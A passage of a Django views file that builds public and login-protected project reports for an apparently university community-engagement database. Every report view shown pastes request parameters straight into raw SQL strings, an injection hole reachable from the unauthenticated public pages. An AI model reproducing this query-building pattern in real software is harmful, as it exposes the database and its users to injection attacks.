"total_uno_faculty": obj[13],"total_k12_students": obj[14], "total_k12_hours": obj[15], "total_other_community_members": obj[16], "activityType": obj[17], "description": obj[18], "project_type": obj[19] , "end_semester": obj[20], "end_academic_year" : obj[21], "sub_category" : obj[22], "campus_lead_staff": obj[23], "mission_image": obj[24], "other_activity_type": obj[25], "other_sub_category": obj[26], "sub_tags": obj[27]}) cursor.close() return render(request, 'projects/allProjects.html', {'project': projects_list, 'data_definition':data_definition, "missions": missions, "communityPartners": communityPartners, 'campus_filter': campus_filter, 'college_filter': campusPartners, 'campus_id': campus_id, 'k12_choices': k12_choices, 'k12_selection': k12_selection, 'cec_part_choices': cec_part_choices, 'cec_part_selection': cec_part_selection,'projects': project_filter}) # all projects ends here @login_required() def SearchForProjectAdd(request,pk): foundProject = None names = [] for project in Project.objects.all(): names.append(project.project_name) campusUserProjectsNames = [] campusPartnerProjects = ProjectCampusPartner.objects.all() for project in ProjectCampusPartner.objects.all(): campusUserProjectsNames.append(project.project_name) for project in Project.objects.all(): if project.pk == int(pk): foundProject = project cp = CampusPartnerUser.objects.filter(user_id=request.user.id)[0].campus_partner object = ProjectCampusPartner(project_name=foundProject, campus_partner=cp) object.save() return redirect("myProjects") #Public reports start here #New view for project public table and card view def projectstablePublicReport(request): selectedprojectId = request.GET.get('proj_id_list', None) data_definition=DataDefinition.objects.all() missions = ProjectMissionFilter(request.GET, queryset=ProjectMission.objects.filter(mission_type='Primary')) status_draft = Status.objects.filter(name='Drafts') project_filter = ProjectFilter(request.GET, queryset=Project.objects.all().exclude(status__in=status_draft)) communityPartners = communityPartnerFilter(request.GET, queryset=CommunityPartner.objects.all()) campusPartners = CampusFilter(request.GET, queryset=CampusPartner.objects.all()) campus_filtered_ids = campusPartners.qs.values_list('id', flat=True) # campus_filtered_ids = [campus.id for campus in campusPartners.qs] campus_project_filter = ProjectCampusFilter(request.GET, queryset=ProjectCampusPartner.objects.filter( campus_partner_id__in=campus_filtered_ids)) projects_list=[] cursor = connection.cursor() k12_selection = request.GET.get('k12_flag', None) # k12_init_selection = "All" # if k12_selection is None: # k12_selection = k12_init_selection k12_choices = K12ChoiceForm(initial={'k12_choice': k12_selection}) engagement_type_filter = request.GET.get('engagement_type', None) if engagement_type_filter is None or engagement_type_filter == "All" or engagement_type_filter == '': eng_type_cond = '%' else: eng_type_cond = engagement_type_filter mission_type_filter = request.GET.get('mission', None) if mission_type_filter is None or mission_type_filter == "All" or mission_type_filter == '': mission_type_cond = '%' else: mission_type_cond = mission_type_filter community_type_filter = request.GET.get('community_type', None) if community_type_filter is None or community_type_filter == "All" or community_type_filter == '': community_type_cond = '%' else: community_type_cond = community_type_filter campus_partner_filter = request.GET.get('campus_partner', None) if campus_partner_filter is None or campus_partner_filter == "All" or campus_partner_filter == '': campus_partner_cond = '%' campus_id = 0 else: campus_partner_cond = campus_partner_filter campus_id = int(campus_partner_filter) college_unit_filter = request.GET.get('college_name', None) if college_unit_filter is None or college_unit_filter == "All" or college_unit_filter == '': college_unit_cond = '%' campus_filter_qs = CampusPartner.objects.all() else: college_unit_cond = college_unit_filter campus_filter_qs = CampusPartner.objects.filter(college_name_id=college_unit_cond) campus_filter = [{'name': m.name, 'id': m.id} for m in campus_filter_qs] academic_year_filter = request.GET.get('academic_year', None) acad_years = AcademicYear.objects.all() yrs = [] month = datetime.datetime.now().month year = datetime.datetime.now().year if month > 7: a_year = str(year - 1) + "-" + str(year)[-2:] else: a_year = str(year - 2) + "-" + str(year - 1)[-2:] for e in acad_years: yrs.append(e.id) try: acad_year = AcademicYear.objects.get(academic_year=a_year).id default_yr_id = acad_year except AcademicYear.DoesNotExist: default_yr_id = max(yrs) max_yr_id = max(yrs) if academic_year_filter is None or academic_year_filter == '': academic_start_year_cond = int(default_yr_id) academic_end_year_cond = int(default_yr_id) elif academic_year_filter == "All": academic_start_year_cond = int(max_yr_id) academic_end_year_cond = 1 else: academic_start_year_cond = int(academic_year_filter) academic_end_year_cond = int(academic_year_filter) K12_filter = request.GET.get('k12_flag', None) if K12_filter is None or K12_filter == "All" or K12_filter == '': K12_filter_cond = '%' elif K12_filter == 'Yes': K12_filter_cond = 't' elif K12_filter == 'No': K12_filter_cond = 'f' cec_part_init_selection = "All" cec_part_selection = request.GET.get('weitz_cec_part', None) if cec_part_selection is None or cec_part_selection == "All" or cec_part_selection == '': # cec_part_selection = cec_part_init_selection cec_comm_part_cond = '%' cec_camp_part_cond = '%' elif cec_part_selection == "CURR_COMM": cec_comm_part_cond = 'Current' cec_camp_part_cond = '%' elif cec_part_selection == "FORMER_COMM": cec_comm_part_cond = 'Former' cec_camp_part_cond = '%' elif cec_part_selection == "FORMER_CAMP": cec_comm_part_cond = '%' cec_camp_part_cond = 'Former' elif cec_part_selection == "CURR_CAMP": cec_comm_part_cond = '%' cec_camp_part_cond = 'Current' # params = [eng_type_cond, mission_type_cond, community_type_cond, campus_partner_cond, college_unit_cond, # K12_filter_cond, academic_start_year_cond, academic_end_year_cond, cec_comm_part_cond, cec_camp_part_cond] cursor = connection.cursor() project_start_query = "select distinct p.project_name \ , array_agg(distinct hm.mission_name) mission_area \ , array_agg(distinct pc.name) CommPartners \ , array_agg(distinct c.name) CampPartners \ , array_agg(distinct e.name) engagement_type \ , pa.academic_year \ , p.semester \ , status.name status \ , case when p.start_date is null then 'None' end start_date \ , case when p.end_date is null then 'None' end end_date \ , p.outcomes \ , p.total_uno_students \ , p.total_uno_hours \ , p.total_uno_faculty \ , p.total_k12_students \ , p.total_k12_hours \ , p.total_other_community_members \ , a.name activity_type \ , p.description \ , p.project_type project_type \ , p.end_semester end_semester \ , ea.academic_year end_academic_year \ , array_agg(distinct s.sub_category) sub_category \ , p.campus_lead_staff campus_lead_staff \ , hm.mission_image_url mission_image \ , p.other_activity_type act_type \ , p.other_sub_category other_subCat \ , array_agg(s.sub_category_tags) sub_tags \ from projects_project p \ join projects_projectmission m on p.id = m.project_name_id and lower(m.mission_type) = 'primary' \ left join home_missionarea hm on hm.id = m.mission_id \ left join projects_engagementtype e on e.id = p.engagement_type_id \ left join projects_projectcommunitypartner pp on p.id = pp.project_name_id \ left join partners_communitypartner pc on pp.community_partner_id = pc.id \ left join projects_projectcampuspartner pp2 on p.id = pp2.project_name_id \ left join partners_campuspartner c on pp2.campus_partner_id = c.id \ left join projects_academicyear pa on p.academic_year_id = pa.id \ left join projects_academicyear ea on p.end_academic_year_id = ea.id \ left join projects_activitytype a on p.activity_type_id = a.id \ left join projects_projectsubcategory psub on psub.project_name_id = p.id \ left join projects_subcategory s on psub.sub_category_id = s.id \ left join projects_status status on status.id = p.status_id \ where status.name !='Drafts'\ and ((p.academic_year_id <= " + str(academic_start_year_cond) + ") AND \ (COALESCE(p.end_academic_year_id, p.academic_year_id) >= "+ str(academic_end_year_cond)+")) " clause_query = "" if eng_type_cond !='%': clause_query +=" and e.id::text like '"+ eng_type_cond +"'" if mission_type_cond !='%': clause_query += " and m.mission_id::text like '"+ mission_type_cond + "'" if campus_partner_cond !='%': clause_query += " and pp2.campus_partner_id::text like '" + campus_partner_cond +"'" if college_unit_cond != '%': clause_query +=" and c.college_name_id::text like '" + college_unit_cond +"' " if K12_filter_cond !='%': clause_query +=" and p.k12_flag = '" + K12_filter_cond + "'" if cec_camp_part_cond != '%': clause_query += " and c.cec_partner_status_id in (select id from partners_cecpartnerstatus where name like '"+ cec_camp_part_cond +"')" if community_type_cond != '%': clause_query += " and pc.community_type_id::text like '" + community_type_cond + "'" if cec_comm_part_cond != '%': clause_query += " and pc.cec_partner_status_id in (select id from partners_cecpartnerstatus where name like '" + cec_comm_part_cond + "')" project_end_query = project_start_query + clause_query +" group by p.project_name \ , pa.academic_year \ , p.semester \ , status.name \ , p.start_date \ , p.end_date \ , p.outcomes \ , p.total_uno_students \ , p.total_uno_hours \ , p.total_uno_faculty \ , p.total_k12_students \ , p.total_k12_hours \ , p.total_other_community_members \ , a.name \ , p.description \ , project_type \ , end_semester \ , end_academic_year \ , campus_lead_staff \ , mission_image \ , act_type \ , other_subCat \ order by pa.academic_year desc; " # cursor.execute(sql.all_projects_sql, params) cursor.execute(project_end_query) cec_part_choices = CecPartChoiceForm(initial={'cec_choice': cec_part_selection}) if selectedprojectId is not None: if selectedprojectId.find(",") != -1: project_name_list = selectedprojectId.split(",") cursor.execute(sqlfiles.showSelectedProjects(tuple(project_name_list)), params=None) # cursor.execute(sql.search_projects_sql,str(tuple(project_name_list))) else: projId = "(" + str(selectedprojectId) + ")" cursor.execute(sqlfiles.showSelectedProjects(projId), params=None) # cursor.execute(sql.search_projects_sql,project_name_list) # else: # # cursor.execute(sql.all_projects_sql) for obj in cursor.fetchall(): proj_names = obj[0] name = '' Projectname = proj_names.split(':') if len(Projectname) >= 2 and Projectname[1]: for i in range(0, len(Projectname) - 1): name += Projectname[i] else: for i in Projectname: name = name + str(i) projects_list.append( {"name": name, "projmisn": obj[1], "comm_part": obj[2], "camp_part": obj[3], "engagementType": obj[4], "academic_year": obj[5], "semester": obj[6], "status": obj[7], "startDate": obj[8], "endDate": obj[9], "outcomes": obj[10], "total_uno_students": obj[11], "total_uno_hours": obj[12], "total_uno_faculty": obj[13], "total_k12_students": obj[14], "total_k12_hours": obj[15], "total_other_community_members": obj[16], "activityType": obj[17], "description": obj[18], "project_type": obj[19], "end_semester": obj[20], "end_academic_year": obj[21], "sub_category": obj[22], "campus_lead_staff": obj[23], "mission_image": obj[24], "other_activity_type": obj[25], "other_sub_category": obj[26], "sub_tags": obj[27]}) page = request.GET.get('page', 1) get_copy = request.GET.copy() parameters = get_copy.pop('page', True) and get_copy.urlencode() cursor.close() return render(request, 'reports/projectspublictableview.html', {'project': projects_list, 'data_definition':data_definition, "missions": missions, "communityPartners": communityPartners, 'campus_filter': campus_filter, 'college_filter': campusPartners, 'campus_id': campus_id, 'k12_choices': k12_choices, 'k12_selection': k12_selection, 'cec_part_choices': cec_part_choices, 'cec_part_selection': cec_part_selection,'projects': project_filter,'parameters':parameters}) def projectsPublicReport(request): proj_per_page_cnt = 5 proj_per_page = DataDefinition.objects.get(title='project_count_per_page') if proj_per_page is not None: proj_per_page_cnt = proj_per_page.description selectedprojectId = request.GET.get('proj_id_list', None) data_definition=DataDefinition.objects.all() missions = ProjectMissionFilter(request.GET, queryset=ProjectMission.objects.filter(mission_type='Primary')) status_draft = Status.objects.filter(name='Drafts') project_filter = ProjectFilter(request.GET, queryset=Project.objects.all().exclude(status__in=status_draft)) communityPartners = communityPartnerFilter(request.GET, queryset=CommunityPartner.objects.all()) campusPartners = CampusFilter(request.GET, queryset=CampusPartner.objects.all()) campus_filtered_ids = campusPartners.qs.values_list('id', flat=True) # campus_filtered_ids = [campus.id for campus in campusPartners.qs] campus_project_filter = ProjectCampusFilter(request.GET, queryset=ProjectCampusPartner.objects.filter( campus_partner_id__in=campus_filtered_ids)) projects_list=[] cursor = connection.cursor() k12_selection = request.GET.get('k12_flag', None) # k12_init_selection = "All" # if k12_selection is None: # k12_selection = k12_init_selection k12_choices = K12ChoiceForm(initial={'k12_choice': k12_selection}) engagement_type_filter = request.GET.get('engagement_type', None) if engagement_type_filter is None or engagement_type_filter == "All" or engagement_type_filter == '': eng_type_cond = '%' else: eng_type_cond = engagement_type_filter mission_type_filter = request.GET.get('mission', None) if mission_type_filter is None or mission_type_filter == "All" or mission_type_filter == '': mission_type_cond = '%' else: mission_type_cond = mission_type_filter community_type_filter = request.GET.get('community_type', None) if community_type_filter is None or community_type_filter == "All" or community_type_filter == '': community_type_cond = '%' else: community_type_cond = community_type_filter campus_partner_filter = request.GET.get('campus_partner', None) if campus_partner_filter is None or campus_partner_filter == "All" or campus_partner_filter == '': campus_partner_cond = '%' campus_id = 0 else: campus_partner_cond = campus_partner_filter campus_id = int(campus_partner_filter) college_unit_filter = request.GET.get('college_name', None) if college_unit_filter is None or college_unit_filter == "All" or college_unit_filter == '': college_unit_cond = '%' campus_filter_qs = CampusPartner.objects.all() else: college_unit_cond = college_unit_filter campus_filter_qs = CampusPartner.objects.filter(college_name_id=college_unit_cond) campus_filter = [{'name': m.name, 'id': m.id} for m in campus_filter_qs] academic_year_filter = request.GET.get('academic_year', None) acad_years = AcademicYear.objects.all() yrs = [] month = datetime.datetime.now().month year = datetime.datetime.now().year if month > 7: a_year = str(year - 1) + "-" + str(year)[-2:] else: a_year = str(year - 2) + "-" + str(year - 1)[-2:] for e in acad_years: yrs.append(e.id) try: acad_year = AcademicYear.objects.get(academic_year=a_year).id default_yr_id = acad_year except AcademicYear.DoesNotExist: default_yr_id = max(yrs) max_yr_id = max(yrs) if academic_year_filter is None or academic_year_filter == '': academic_start_year_cond = int(default_yr_id) academic_end_year_cond = int(default_yr_id) elif academic_year_filter == "All": academic_start_year_cond = int(max_yr_id) academic_end_year_cond = 1 else: academic_start_year_cond = int(academic_year_filter) academic_end_year_cond = int(academic_year_filter) K12_filter = request.GET.get('k12_flag', None) if K12_filter is None or K12_filter == "All" or K12_filter == '': K12_filter_cond = '%' elif K12_filter == 'Yes': K12_filter_cond = 't' elif K12_filter == 'No': K12_filter_cond = 'f' cec_part_init_selection = "All" cec_part_selection = request.GET.get('weitz_cec_part', None) if cec_part_selection is None or cec_part_selection == "All" or cec_part_selection == '': # cec_part_selection = cec_part_init_selection cec_comm_part_cond = '%' cec_camp_part_cond = '%' elif cec_part_selection == "CURR_COMM": cec_comm_part_cond = 'Current' cec_camp_part_cond = '%' elif cec_part_selection == "FORMER_COMM": cec_comm_part_cond = 'Former' cec_camp_part_cond = '%' elif cec_part_selection == "FORMER_CAMP": cec_comm_part_cond = '%' cec_camp_part_cond = 'Former' elif cec_part_selection == "CURR_CAMP": cec_comm_part_cond = '%' cec_camp_part_cond = 'Current' cursor = connection.cursor() project_start_query = "select distinct p.project_name \ , array_agg(distinct hm.mission_name) mission_area \ , array_agg(distinct pc.name) CommPartners \ , array_agg(distinct c.name) CampPartners \ , array_agg(distinct e.name) engagement_type \ , pa.academic_year \ , p.semester \ , status.name status \ , case when p.start_date is null then 'None' end start_date \ , case when p.end_date is null then 'None' end end_date \ , p.outcomes \ , p.total_uno_students \ , p.total_uno_hours \ , p.total_uno_faculty \ , p.total_k12_students \ , p.total_k12_hours \ , p.total_other_community_members \ , a.name activity_type \ , p.description \ , p.project_type project_type \ , p.end_semester end_semester \ , ea.academic_year end_academic_year \ , array_agg(distinct s.sub_category) sub_category \ , p.campus_lead_staff campus_lead_staff \ , hm.mission_image_url mission_image \ , p.other_activity_type act_type \ , p.other_sub_category other_subCat \ , array_agg(s.sub_category_tags) sub_tags \ from projects_project p \ join projects_projectmission m on p.id = m.project_name_id and lower(m.mission_type) = 'primary' \ left join home_missionarea hm on hm.id = m.mission_id \ left join projects_engagementtype e on e.id = p.engagement_type_id \ left join projects_projectcommunitypartner pp on p.id = pp.project_name_id \ left join partners_communitypartner pc on pp.community_partner_id = pc.id \ left join projects_projectcampuspartner pp2 on p.id = pp2.project_name_id \ left join partners_campuspartner c on pp2.campus_partner_id = c.id \ left join projects_academicyear pa on p.academic_year_id = pa.id \ left join projects_academicyear ea on p.end_academic_year_id = ea.id \ left join projects_activitytype a on p.activity_type_id = a.id \ left join projects_projectsubcategory psub on psub.project_name_id = p.id \ left join projects_subcategory s on psub.sub_category_id = s.id \ left join projects_status status on status.id = p.status_id \ where status.name != 'Drafts' \ and ((p.academic_year_id <= " + str(academic_start_year_cond) + ") AND \ (COALESCE(p.end_academic_year_id, p.academic_year_id) >= " + str(academic_end_year_cond) + ")) " clause_query = "" if eng_type_cond !='%': clause_query +=" and e.id::text like '"+ eng_type_cond +"'" if mission_type_cond !='%': clause_query += " and m.mission_id::text like '"+ mission_type_cond + "'" if campus_partner_cond !='%': clause_query += " and pp2.campus_partner_id::text like '" + campus_partner_cond +"'" if college_unit_cond != '%': clause_query +=" and c.college_name_id::text like '" + college_unit_cond +"' " if K12_filter_cond !='%': clause_query +=" and p.k12_flag = '" + K12_filter_cond + "'" if cec_camp_part_cond != '%': clause_query += " and c.cec_partner_status_id in (select id from partners_cecpartnerstatus where name like '"+ cec_camp_part_cond +"')" if community_type_cond != '%': clause_query += " and pc.community_type_id::text like '" + community_type_cond + "'" if cec_comm_part_cond != '%': clause_query += " and pc.cec_partner_status_id in (select id from partners_cecpartnerstatus where name like '" + cec_comm_part_cond + "')" project_end_query = project_start_query + clause_query +" group by p.project_name \ , pa.academic_year \ , p.semester \ , status.name \ , p.start_date \ , p.end_date \ , p.outcomes \ , p.total_uno_students \ , p.total_uno_hours \ , p.total_uno_faculty \ , p.total_k12_students \ , p.total_k12_hours \ , p.total_other_community_members \ , a.name \ , p.description \ , project_type \ , end_semester \ , end_academic_year \ , campus_lead_staff \ , mission_image \ , act_type \ , other_subCat \ order by pa.academic_year desc; " cursor.execute(project_end_query) cec_part_choices = CecPartChoiceForm(initial={'cec_choice': cec_part_selection}) print("CEC partner condition: ", cec_part_selection) if selectedprojectId is not None and selectedprojectId != '': if selectedprojectId.find(",") != -1: project_name_list = selectedprojectId.split(",") print('project_name_list: ', str(tuple(project_name_list))) cursor.execute(sqlfiles.showSelectedProjects(tuple(project_name_list)), params=None) # cursor.execute(sql.search_projects_sql,str(tuple(project_name_list))) else: projId = "(" + str(selectedprojectId) + ")" print('project_name_list--', projId) cursor.execute(sqlfiles.showSelectedProjects(projId), params=None) # cursor.execute(sql.search_projects_sql,project_name_list) # else: # # cursor.execute(sql.all_projects_sql) for obj in cursor.fetchall(): proj_names = obj[0] name = '' Projectname = proj_names.split(':') if len(Projectname) >= 2 and Projectname[1]: for i in range(0, len(Projectname) - 1): name += Projectname[i] else: for i in Projectname: name = name + str(i) print("Project name ------ ", name) projects_list.append({"name": name, "projmisn": obj[1],"comm_part": obj[2], "camp_part": obj[3],"engagementType": obj[4], "academic_year": obj[5], "semester": obj[6], "status": obj[7],"startDate": obj[8], "endDate": obj[9],"outcomes": obj[10], "total_uno_students": obj[11], "total_uno_hours": obj[12], "total_uno_faculty": obj[13],"total_k12_students": obj[14], "total_k12_hours": obj[15], "total_other_community_members": obj[16], "activityType": obj[17], "description": obj[18], "project_type": obj[19] , "end_semester": obj[20], "end_academic_year" : obj[21], "sub_category" : obj[22], "campus_lead_staff": obj[23], "mission_image": obj[24], "other_activity_type": obj[25], "other_sub_category": obj[26], "sub_tags": obj[27]}) page = request.GET.get('page', 1) paginator = Paginator(projects_list, proj_per_page_cnt) try: cards = paginator.page(page) except PageNotAnInteger: cards = paginator.page(1) except EmptyPage: cards = paginator.page(paginator.num_pages) get_copy = request.GET.copy() parameters = get_copy.pop('page', True) and get_copy.urlencode() cursor.close() return render(request, 'reports/projects_public_view.html', {'project': projects_list, 'data_definition':data_definition, "missions": missions, "communityPartners": communityPartners, 'campus_filter': campus_filter, 'college_filter': campusPartners, 'campus_id': campus_id, 'k12_choices': k12_choices, 'k12_selection': k12_selection, 'cec_part_choices': cec_part_choices, 'cec_part_selection': cec_part_selection,'projects': project_filter, 'cards':cards, 'parameters':parameters}) # project private card and table view starts here @login_required() def projectsPrivateReport(request): proj_per_page = DataDefinition.objects.get(title='project_count_per_page') print('proj_per_page--', proj_per_page) proj_per_page_cnt = 5 if proj_per_page is not None: proj_per_page_cnt = proj_per_page.description selectedprojectId = request.GET.get('proj_id_list', None) data_definition=DataDefinition.objects.all() missions = ProjectMissionFilter(request.GET, queryset=ProjectMission.objects.filter(mission_type='Primary')) status_draft = Status.objects.filter(name='Drafts') project_filter = ProjectFilter(request.GET, queryset=Project.objects.all().exclude(status__in=status_draft)) communityPartners = communityPartnerFilter(request.GET, queryset=CommunityPartner.objects.all()) campusPartners = CampusFilter(request.GET, queryset=CampusPartner.objects.all()) campus_filtered_ids = campusPartners.qs.values_list('id', flat=True) campus_project_filter = ProjectCampusFilter(request.GET, queryset=ProjectCampusPartner.objects.filter( campus_partner_id__in=campus_filtered_ids)) projects_list = [] cursor = connection.cursor() k12_selection = request.GET.get('k12_flag', None) # k12_init_selection = "All" # if k12_selection is None: # k12_selection = k12_init_selection k12_choices = K12ChoiceForm(initial={'k12_choice': k12_selection}) engagement_type_filter = request.GET.get('engagement_type', None) if engagement_type_filter is None or engagement_type_filter == "All" or engagement_type_filter == '': eng_type_cond = '%' else: eng_type_cond = engagement_type_filter mission_type_filter = request.GET.get('mission', None) if mission_type_filter is None or mission_type_filter == "All" or mission_type_filter == '': mission_type_cond = '%' else: mission_type_cond = mission_type_filter community_type_filter = request.GET.get('community_type', None) if community_type_filter is None or community_type_filter == "All" or community_type_filter == '': community_type_cond = '%' else: community_type_cond = community_type_filter campus_partner_filter = request.GET.get('campus_partner', None) if campus_partner_filter is None or campus_partner_filter == "All" or campus_partner_filter == '': campus_partner_cond = '%' campus_id = 0 else: campus_partner_cond = campus_partner_filter campus_id = int(campus_partner_filter) college_unit_filter = request.GET.get('college_name', None) if college_unit_filter is None or college_unit_filter == "All" or college_unit_filter == '': college_unit_cond = '%' campus_filter_qs = CampusPartner.objects.all() else: college_unit_cond = college_unit_filter campus_filter_qs = CampusPartner.objects.filter(college_name_id=college_unit_cond) campus_filter = [{'name': m.name, 'id': m.id} for m in campus_filter_qs] academic_year_filter = request.GET.get('academic_year', None) acad_years = AcademicYear.objects.all() yrs = [] month = datetime.datetime.now().month year = datetime.datetime.now().year if month > 7: a_year = str(year - 1) + "-" + str(year)[-2:] else: a_year = str(year - 2) + "-" + str(year - 1)[-2:] for e in acad_years: yrs.append(e.id) try: acad_year = AcademicYear.objects.get(academic_year=a_year).id default_yr_id = acad_year except AcademicYear.DoesNotExist: default_yr_id = max(yrs) max_yr_id = max(yrs) if academic_year_filter is None or academic_year_filter == '': academic_start_year_cond = int(default_yr_id) academic_end_year_cond = int(default_yr_id) elif academic_year_filter == "All": academic_start_year_cond = int(max_yr_id) academic_end_year_cond = 1 else: academic_start_year_cond = int(academic_year_filter) academic_end_year_cond = int(academic_year_filter) K12_filter = request.GET.get('k12_flag', None) if K12_filter is None or K12_filter == "All" or K12_filter == '': K12_filter_cond = '%' elif K12_filter == 'Yes': K12_filter_cond = 't' elif K12_filter == 'No': K12_filter_cond = 'f' cec_part_init_selection = "All" cec_part_selection = request.GET.get('weitz_cec_part', None) if cec_part_selection is None or cec_part_selection == "All" or cec_part_selection == '': # cec_part_selection = cec_part_init_selection cec_comm_part_cond = '%' cec_camp_part_cond = '%' elif cec_part_selection == "CURR_COMM": cec_comm_part_cond = 'Current' cec_camp_part_cond = '%' elif cec_part_selection == "FORMER_COMM": cec_comm_part_cond = 'Former' cec_camp_part_cond = '%' elif cec_part_selection == "FORMER_CAMP": cec_comm_part_cond = '%' cec_camp_part_cond = 'Former' elif cec_part_selection == "CURR_CAMP": cec_comm_part_cond = '%' cec_camp_part_cond = 'Current' cursor = connection.cursor() project_start_query = "select distinct p.project_name \ , array_agg(distinct hm.mission_name) mission_area \ , array_agg(distinct pc.name) CommPartners \ , array_agg(distinct c.name) CampPartners \ , array_agg(distinct e.name) engagement_type \ , pa.academic_year \ , p.semester \ , status.name status \ , case when p.start_date is null then 'None' end start_date \ , case when p.end_date is null then 'None' end end_date \ , p.outcomes \ , p.total_uno_students \ , p.total_uno_hours \ , p.total_uno_faculty \ , p.total_k12_students \ , p.total_k12_hours \ , p.total_other_community_members \ , a.name activity_type \ , p.description \ , p.project_type project_type \ , p.end_semester end_semester \ , ea.academic_year end_academic_year \ , array_agg(distinct s.sub_category) sub_category \ , p.campus_lead_staff campus_lead_staff \ , hm.mission_image_url mission_image \ , p.other_activity_type act_type \ , p.other_sub_category other_subCat \ , array_agg(s.sub_category_tags) sub_tags \ from projects_project p \ join projects_projectmission m on p.id = m.project_name_id and lower(m.mission_type) = 'primary' \ left join home_missionarea hm on hm.id = m.mission_id \ left join projects_engagementtype e on e.id = p.engagement_type_id \ left join projects_projectcommunitypartner pp on p.id = pp.project_name_id \ left join partners_communitypartner pc on pp.community_partner_id = pc.id \ left join projects_projectcampuspartner pp2 on p.id = pp2.project_name_id \ left join partners_campuspartner c on pp2.campus_partner_id = c.id \ left join projects_academicyear pa on p.academic_year_id = pa.id \ left join projects_academicyear ea on p.end_academic_year_id = ea.id \ left join projects_activitytype a on p.activity_type_id = a.id \ left join projects_projectsubcategory psub on psub.project_name_id = p.id \ left join projects_subcategory s on psub.sub_category_id = s.id \ left join projects_status status on status.id = p.status_id \ where status.name != 'Drafts' \ and ((p.academic_year_id <= " + str(academic_start_year_cond) + ") AND \ (COALESCE(p.end_academic_year_id, p.academic_year_id) >= " + str(academic_end_year_cond) + ")) " clause_query = "" if eng_type_cond !='%': clause_query +=" and e.id::text like '"+ eng_type_cond +"'" if mission_type_cond !='%': clause_query += " and m.mission_id::text like '"+ mission_type_cond + "'" if campus_partner_cond !='%': clause_query += " and pp2.campus_partner_id::text like '" + campus_partner_cond +"'" if college_unit_cond != '%': clause_query +=" and c.college_name_id::text like '" + college_unit_cond +"' " if K12_filter_cond !='%': clause_query +=" and p.k12_flag = '" + K12_filter_cond + "'" if cec_camp_part_cond != '%': clause_query += " and c.cec_partner_status_id in (select id from partners_cecpartnerstatus where name like '"+ cec_camp_part_cond +"')" if community_type_cond != '%': clause_query += " and pc.community_type_id::text like '" + community_type_cond + "'" if cec_comm_part_cond != '%': clause_query += " and pc.cec_partner_status_id in (select id from partners_cecpartnerstatus where name like '" + cec_comm_part_cond + "')" project_end_query = project_start_query + clause_query +" group by p.project_name \ , pa.academic_year \ , p.semester \ , status.name \ , p.start_date \ , p.end_date \ , p.outcomes \ , p.total_uno_students \ , p.total_uno_hours \ , p.total_uno_faculty \ , p.total_k12_students \ , p.total_k12_hours \ , p.total_other_community_members \ , a.name \ , p.description \ , project_type \ , end_semester \ , end_academic_year \ , campus_lead_staff \ , mission_image \ , act_type \ , other_subCat \ order by pa.academic_year desc; " cursor.execute(project_end_query) cec_part_choices = CecPartChoiceForm(initial={'cec_choice': cec_part_selection}) print("CEC partner condition: ", cec_part_selection) if selectedprojectId is not None: if selectedprojectId.find(",") != -1: project_name_list = selectedprojectId.split(",") print('project_name_list: ', str(tuple(project_name_list))) cursor.execute(sqlfiles.showSelectedProjects(tuple(project_name_list)), params=None) # cursor.execute(sql.search_projects_sql,str(tuple(project_name_list))) else: projId = "(" + str(selectedprojectId) + ")" print('project_name_list--', projId) cursor.execute(sqlfiles.showSelectedProjects(projId), params=None) for obj in cursor.fetchall(): proj_names = obj[0] name = '' Projectname = proj_names.split(':') if len(Projectname) >= 2 and Projectname[1]: for i in range(0, len(Projectname) - 1): name += Projectname[i] else: for i in Projectname: name = name + str(i) projects_list.append({"name": name, "projmisn": obj[1],"comm_part": obj[2], "camp_part": obj[3],"engagementType": obj[4], "academic_year": obj[5], "semester": obj[6], "status": obj[7],"startDate": obj[8], "endDate": obj[9],"outcomes": obj[10], "total_uno_students": obj[11], "total_uno_hours": obj[12], "total_uno_faculty": obj[13],"total_k12_students": obj[14], "total_k12_hours": obj[15], "total_other_community_members": obj[16], "activityType": obj[17], "description": obj[18], "project_type": obj[19] , "end_semester": obj[20], "end_academic_year" : obj[21], "sub_category" : obj[22], "campus_lead_staff": obj[23], "mission_image": obj[24], "other_activity_type": obj[25], "other_sub_category": obj[26], "sub_tags": obj[27]}) page = request.GET.get('page', 1) paginator = Paginator(projects_list, proj_per_page_cnt) try: cards = paginator.page(page) except PageNotAnInteger: cards = paginator.page(1) except EmptyPage: cards = paginator.page(paginator.num_pages) get_copy = request.GET.copy() parameters = get_copy.pop('page', True) and get_copy.urlencode() cursor.close() return render(request, 'reports/projects_private_view.html', {'project': projects_list, 'data_definition':data_definition, "missions": missions, "communityPartners": communityPartners, 'campus_filter': campus_filter, 'college_filter': campusPartners, 'campus_id': campus_id, 'k12_choices': k12_choices, 'k12_selection': k12_selection, 'cec_part_choices': cec_part_choices, 'cec_part_selection': cec_part_selection,'projects': project_filter, 'cards':cards, 'parameters':parameters}) @login_required() def projectstablePrivateReport(request): selectedprojectId = request.GET.get('proj_id_list', None) print('selectedprojectId--',selectedprojectId) data_definition=DataDefinition.objects.all() missions = ProjectMissionFilter(request.GET, queryset=ProjectMission.objects.filter(mission_type='Primary')) status_draft = Status.objects.filter(name='Drafts') project_filter = ProjectFilter(request.GET, queryset=Project.objects.all().exclude(status__in=status_draft)) communityPartners = communityPartnerFilter(request.GET, queryset=CommunityPartner.objects.all()) campusPartners = CampusFilter(request.GET, queryset=CampusPartner.objects.all()) # campus_filtered_ids = campusPartners.qs.values_list('id', flat=True) # campus_filtered_ids = [campus.id for campus in campusPartners.qs] # campus_project_filter = ProjectCampusFilter(request.GET, queryset=ProjectCampusPartner.objects.filter( # campus_partner_id__in=campus_filtered_ids)) projects_list=[] cursor = connection.cursor() k12_selection = request.GET.get('k12_flag', None) # k12_init_selection = "All" # if k12_selection is None: # k12_selection = k12_init_selection k12_choices = K12ChoiceForm(initial={'k12_choice': k12_selection}) engagement_type_filter = request.GET.get('engagement_type', None) if engagement_type_filter is None or engagement_type_filter == "All" or engagement_type_filter == '': eng_type_cond = '%' else: eng_type_cond = engagement_type_filter mission_type_filter = request.GET.get('mission', None) if mission_type_filter is None or mission_type_filter == "All" or mission_type_filter == '': mission_type_cond = '%' else: mission_type_cond = mission_type_filter community_type_filter = request.GET.get('community_type', None) if community_type_filter is None or community_type_filter == "All" or community_type_filter == '': community_type_cond = '%' else: community_type_cond = community_type_filter campus_partner_filter = request.GET.get('campus_partner', None) if campus_partner_filter is None or campus_partner_filter == "All" or campus_partner_filter == '': campus_partner_cond = '%' campus_id = 0 else: campus_partner_cond = campus_partner_filter campus_id = int(campus_partner_filter) college_unit_filter = request.GET.get('college_name', None) if college_unit_filter is None or college_unit_filter == "All" or college_unit_filter == '': college_unit_cond = '%' campus_filter_qs 